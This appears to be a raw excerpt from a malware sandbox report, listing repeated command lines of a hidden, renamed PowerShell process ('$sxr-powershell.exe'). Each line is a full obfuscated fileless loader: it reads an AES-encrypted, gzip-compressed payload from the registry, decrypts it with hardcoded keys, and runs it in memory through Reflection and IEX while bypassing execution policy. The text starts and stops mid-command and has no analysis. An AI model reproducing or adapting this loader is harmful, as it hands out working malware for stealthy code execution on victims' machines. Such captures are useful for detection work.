'')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:5828

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6384).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:5840

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6384).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, $lHCNf.Length);$lHCNf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lHCNf);$mvSac = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SMFDBATqcCLCffiPgcVkeA==');$mvSac = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mvSac, 0, $mvSac.Length);$mvSac = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mvSac);$fYhvB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('m0/I7rIGbiBVxCE4WTkxKXrIhId+xRJu1rELFg0sRatzAZFJErBaN0cXbJ97o8zEIQUuHdn0E9FLwW/h/U1hc6jwkcijx4lE6VkAH1OJkts5kyb2YIRluw8m1KC/amNr0TCUnPudPp3KBcVKGDC8TzQuwcLP3xvVlp9FkaoWtmG/i2TedFhwHEgMOB09p7WNJA0Q1cbZD90fmmUxB03UL7S26YlUwLgKbUG2E+hkLUo2XBW1SjqK7s+7KIv+FxsKe1Q6epFglHVxCjSwGwIQAUvg2C1GxLbKYm14kxWUxy85/0FO+48f/xHK6Ka1ZeQ20mgOghTmQ9IpFjCI/zOREYShr3iKDdcQdquznhnOBRIW9QNSuxuM+GBRAkeVB3KmWlyH/45GbF7FqE/6zVPhshlGma0EpQE1qJQpZ79Dnyw=');$fYhvB = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fYhvB, 0, $fYhvB.Length);$fYhvB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fYhvB);$hBYHy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('C9m3OdpGwFdHwPwMI02P1Q==');$hBYHy = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hBYHy, 0, $hBYHy.Length);$hBYHy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hBYHy);$mLgUM = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnlbpdXHpcZ8OIW6I8JHEw==');$mLgUM = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mLgUM, 0, $mLgUM.Length);$mLgUM = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mLgUM);$UJkfe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRq92anf130ThOkt+/oHfQ==');$UJkfe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UJkfe, 0, $UJkfe.Length);$UJkfe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UJkfe);$diyny = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOan84KwuQvybSDbMNzbwg==');$diyny = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diyny, 0, $diyny.Length);$diyny = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diyny);$igBFA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9I86vNBFZFkDSOaT6Axf1g==');$igBFA = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igBFA, 0, $igBFA.Length);$igBFA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igBFA);$InvRe0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YYa8OopsH+ndA18TV9aICA==');$InvRe0 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe0, 0, $InvRe0.Length);$InvRe0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe0);$InvRe1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2FAiKLQ+H7mhnGGHhuoROg==');$InvRe1 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe1, 0, $InvRe1.Length);$InvRe1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe1);$InvRe2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K4DD6mV1zT0l1FL5isTMSg==');$InvRe2 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe2, 0, $InvRe2.Length);$InvRe2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe2);$InvRe3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tNPPHPCKJCXJeBbFBVQkNg==');$InvRe3 = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe3, 0, $InvRe3.Length);$InvRe3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe3);$XATWs.Dispose();$zAHbk1.Dispose();$HsmvD = [Microsoft.Win32.Registry]::$diyny.$UJkfe($InvRe).$mLgUM($lHCNf);$aPQNt=[string[]]$HsmvD.Split('\');$Kpzfr=bvLKH(QPIus([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[1])));yOuXN $Kpzfr (,[string[]] ('%*'));$VDekS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($aPQNt[0]);$zAHbk = New-Object System.Security.Cryptography.AesManaged;$zAHbk.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$bZtha = $zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')();$VDekS = $bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VDekS, 0, $VDekS.Length);$bZtha.Dispose();$zAHbk.Dispose();$qbDkP = New-Object System.IO.MemoryStream(, $VDekS);$xZBvX = New-Object System.IO.MemoryStream;$OugwY = New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::$InvRe1);$OugwY.$igBFA($xZBvX);$OugwY.Dispose();$qbDkP.Dispose();$xZBvX.Dispose();$VDekS = $xZBvX.ToArray();$wDNpJ = $fYhvB | IEX;$HzAuX = $wDNpJ::$InvRe2($VDekS);$njNEM = $HzAuX.EntryPoint;$njNEM.$InvRe0($null, (, [string[]] ($mvSac)))
5⤵
PID:3976

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6384).WaitForExit();[System.Threading.Thread]::Sleep(5000); function QPIus($PJoKM){ $zAHbk=[System.Security.Cryptography.Aes]::Create(); $zAHbk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zAHbk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zAHbk.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8='); $zAHbk.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ=='); $bZtha=$zAHbk.('rotpyrceDetaerC'[-1..-15] -join '')(); $rEqrJ=$bZtha.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PJoKM, 0, $PJoKM.Length); $bZtha.Dispose(); $zAHbk.Dispose(); $rEqrJ;}function bvLKH($PJoKM){ $qbDkP=New-Object System.IO.MemoryStream(,$PJoKM); $xZBvX=New-Object System.IO.MemoryStream; $OugwY=New-Object System.IO.Compression.GZipStream($qbDkP, [IO.Compression.CompressionMode]::Decompress); $OugwY.CopyTo($xZBvX); $OugwY.Dispose(); $qbDkP.Dispose(); $xZBvX.Dispose(); $xZBvX.ToArray();}function yOuXN($PJoKM,$TPKFP){ $HzAuX=[System.Reflection.Assembly]::Load([byte[]]$PJoKM); $njNEM=$HzAuX.EntryPoint; $njNEM.Invoke($null, $TPKFP);}$zAHbk1 = New-Object System.Security.Cryptography.AesManaged;$zAHbk1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zAHbk1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zAHbk1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w6PbCSjOWBULeJA+WxjUusyz8BOgvMC8wi3jYye4mi8=');$zAHbk1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('01Zkym2rf0478fR2cIhJtQ==');$XATWs = $zAHbk1.('rotpyrceDetaerC'[-1..-15] -join '')();$InvRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K1CkLsbgHsaqjP07dOw2WA==');$InvRe = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($InvRe, 0, $InvRe.Length);$InvRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($InvRe);$lHCNf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mgaXTEcchBwKiFfurNf/ZvU7pDIOIRUS5fl2vv2xXeE=');$lHCNf = $XATWs.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lHCNf, 0, 